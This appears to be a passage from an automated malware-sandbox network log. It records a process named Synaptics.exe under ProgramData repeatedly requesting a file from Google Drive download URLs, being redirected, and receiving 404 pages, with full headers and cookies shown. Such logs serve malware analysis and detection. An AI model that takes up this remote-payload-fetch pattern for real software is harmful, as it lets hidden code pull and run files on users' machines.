                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:41 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:41 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="jN5jAEk9_2S8oBGZAmtClQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:41 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      38 | 192.168.2.11 | 49912 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:41 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                                                                                                                                                      2024-12-30 10:25:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-_oSdaHcGhrPLQB8j9Q8VkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      39 | 192.168.2.11 | 49913 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:41 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=nQ2TbwCw_ds2rWzTR5JkIhluelcY1MRCn-c4_sKdsONDCNospwJyv_xrPNwxBWcQxJh_t8gLmPoB0GrqaOcT2kGisWQMB7I_oTKoKoiThmmpcu7c574eVS0LqYPkHz7iwfqb4ioYh3zYigsn6oOTvDlpPI3vch8zq2ouTiIP1UVQX5HNFuArwxUL
                                                                                                                                                      2024-12-30 10:25:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YdFcRz7PcTvjerU0KbUGtA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      40 | 192.168.2.11 | 49914 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:41 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:42 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6LEldmyVtq1I0dZB6tvLPuK6yC_Y7ZD6XTgWdx3gT3KiFE6rbV2PQqfb3oV-IIzA5e6LP8p28
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-IslGZ1Sr9Ws93cxFlpmqRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:42 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                      2024-12-30 10:25:42 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="cEwMp3MnqqJveVtrRTz4Sw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                      2024-12-30 10:25:42 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                      41 | 192.168.2.11 | 49920 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                      2024-12-30 10:25:42 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
                                                                                                                                                      2024-12-30 10:25:42 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC6aJCs7LypraYTT4-ESRkuEpyqMixg-7eCxiNTRF9Kj6A46X3l6CTAlcmVd5p9rhguK
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:42 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-t5zpjG22om98qdy5ZMnG0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-12-30 10:25:42 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                      2024-12-30 10:25:42 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="dka1aF_5fYq0cGNJ7lWjJg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                      2024-12-30 10:25:42 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.11 | 49922 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:42 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
2024-12-30 10:25:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LqRVkbVtOHf17a6HvsqfoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.11 | 49921 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:42 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
2024-12-30 10:25:43 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-Miu6wL18IUpj3Ef3ANgqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Server: ESF
                                                                                                                                                      Content-Length: 0
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.11 | 49929 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:44 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC4Ey4jYJWFMZ3kTQHVfi5EqgF5cYJ8ZKhMFhtHYaS1BHxTEdMc-UtSW-HvFG4tITNP83Fh3iLI
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:43 GMT
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-6vfhRP9RCUfnS6f_ms_dNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:44 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:25:44 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="3SODsHd-AdjcS7xpjF_pwQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:25:44 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.11 | 49936 | 142.250.181.225 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Cookie: NID=520=bA9uMe60wCtj2Y6Oeni40IZ7Drd3kHVwpuUFy7SBplpjC-DtLSM9a19urjQ1fMdzPMmMj2FlSHmgauif21sRAsP3T1Bi6z0aq44CLure_CYkGFFhtD-_4fZz4_10Jsl6tNbivv4MgWqDCqe6JGU-gUJt_RrSkNCzthUsgqoMdnW7dCOw_mG1AapT
2024-12-30 10:25:44 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                      X-GUploader-UploadID: AFiumC5ijVgIL3hiezj_7lKE67IOlzlgLTM_UijCaFOnIxMnVz4ZahfxzPwJtKINzzzNbyQp
                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-vMLjO7_-RWbXTbCcD8tE6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Length: 1652
                                                                                                                                                      Server: UploadServer
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                      Connection: close
2024-12-30 10:25:44 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:44 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="KHOpj6np9DrD5DWTGeiamA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:44 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.11 | 49937 | 172.217.18.110 | 443 | 7604 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:25:43 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                                      Host: docs.google.com
                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                      Cookie: NID=520=JrCvw9g0JO-PIdL4Vyh8uXOUt2y1Zfvt6jiAEb0jdF_t2c3S8mdLq5LIOKtJklMX_OujyWE4LrNzFPdfed-9uz58CeGjHTeXeKURwg3XoiTDHwgur-YL6x_jOeCDgHS-vfdUjZq1_CoOelsbNhann97ORn6Okojf9evwpjaeznhUP-cGfOS6hc0
2024-12-30 10:25:44 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                      Content-Type: application/binary
                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Date: Mon, 30 Dec 2024 10:25:44 GMT
                                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-sRKOqfdg700FP8bJcIXoJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                      Server: ESF
